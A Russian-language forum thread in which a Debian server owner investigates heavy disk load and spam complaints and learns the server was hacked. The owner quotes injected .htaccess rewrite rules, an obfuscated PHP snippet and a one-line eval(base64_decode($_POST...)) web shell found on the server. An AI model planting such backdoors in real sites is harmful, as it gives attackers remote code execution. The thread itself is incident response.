Нагрузка на HDD, сервер Debian

1) sendmail писали педерасты.

добавил скрины, думаю они больше скажут...

а вот командой iowait видно что больше всего нагружает винты, и это: - [jbd2/md2-8] - sendmail

Мне квадратные скобки говорят о том, что это процесс ядра. С чего вы взяли, что он имеет отношение к sendmail? Гугл подсказывает, что jdb2 - это процесс журналирования ext4. Вполне законная активность. Следующим процессом по нагрузке идёт mysqld, что тоже вполне ожидаемо. Ну и в суммарной нагрузке в 450 КилоЧегоУгодно/с не вижу ничего критического.

Пардон, 450 К/с - это сумма двух самых топовых процесса, вверху индикатор показывает, что суммарный показатель ~1800. Но очевидно, что эта нагрузка размазана по массе процессов (хотя сортировка на экране странная, не очень понятная полная картина). Осмотрите _все_ процессы в системе. Если есть подозрения на sendmail, проверьте свой сервер на многочисленных онлайн-тестах на защищённость почтовых серверов. Гуглите «mail server security test online».

Может это происки MySQL? Если куча innodb-таблиц, то параметр innodb_flush_log_at_trx_commit не равен «1» случаем? У меня была похожая проблема, после установки innodb_flush_log_at_trx_commit = 2 ситуация очень улучшилась.

Да, подозрение у меня именно на него.

я остановил сервис командой service sendmail stop но без результата. Он видимо потом запускается.

А так же от хостера приходит письмо говорящее о том, что с сервера идут какие-то атаки и спам.

Сейчас пытаюсь проверить на защищённость почтовых сервисов. Но если честно я готов от него отказаться, так как форум мой отсылает письма через яндекс.

вот эти данные из htop меня беспокоят

2875 smmsp 20 0 79516 28920 564 D 0.0 0.1 0:32.03 sendmail: MSP: running queue: /var/spool/mqueue-client

активные юзеры обычно:

• root
• www-data
• mysql

а вот smmsp никогда не видел.

В нормальном состоянии sendmail пишет в лог (/var/log/maillog) про принятные и отправленные письма. Если там много записей, значит он действительно принимает/отправляет много писем, ищите почему. Для этого читайте логи, если письма принимаются по smtpd (от другого хоста), значит что-то не так с настройками sendmail'а, а если письма принимаются от локального пользователя, скорее всего дырка в скриптах.

скорее всего принимаетсяот локального пользователя, так как нашел вирус или шелл (не знаю как правильно)...

Вот такое содержимое файлов: 1. .htacess - тут дописано первые 5 строк

RewriteEngine on
RewriteCond %{REQUEST_URI} ^/dat/.*
RewriteRule . /hooks/dynsys.php [L,QSA]
php_flag display_errors on
php_value error_reporting E_ALL


AddDefaultCharset utf-8
<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
php_value display_errors 1
php_value error_reporting 2039

2. lang.php - этот видимо что-то подставлял в url

<?php ${"\x47L\x4f\x42\x41\x4c\x53"}["\x68u\x77\x69\x76\x63\x61\x71wk\x79\x79"]="ips";${"GL\x4f\x42A\x4c
?>

3. system.php - думаю этот тоже причастен

<?php
                    eval(base64_decode($_POST['n53b3a6']));?>

И есть еще другие смысла думаю нет их вываливать сюда. Это у меня в первый раз, как действовать в такой ситуации?

Да у тебя же mysql!

Это не вирус или шелл, это следы взлома. Нужно внимательно изучать логи, думать и понимать через что взломали.

Для начала определить какие службы (демоны) доступны из интернета, потом кроме апача ничего нет, начиать смотреть скрипты... Вебмин установлен?

Ну, а прямо сейчас, наверно, нужно остановить апач, чтобы прекратить поток спама и прочего.